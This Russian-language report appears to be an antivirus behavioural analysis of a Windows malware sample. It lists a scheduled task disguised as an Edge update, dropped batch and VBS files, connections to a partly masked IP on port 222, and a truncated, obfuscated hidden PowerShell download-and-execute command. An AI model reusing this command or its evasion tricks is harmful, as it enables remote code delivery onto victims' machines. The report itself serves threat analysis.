Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\micros oftedgeupdate
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\conted.bat
- C:\users\public\conted.vbs
Сетевая активность
Подключается к
- '34.##.252.187':222
TCP
Запросы HTTP GET
- http://34.##.252.187:222/d.txt via 34.##.252.187
- http://34.##.252.187:222/7X.jpg via 34.##.252.187
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://34.##.252.187:222/7X.jpg'')'.RePLACe('/-/--/-/','ADSTRING')...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://34.##.252.187:222/7X.jpg'')'.RePLACe('/-/--/-/','ADSTRING')...
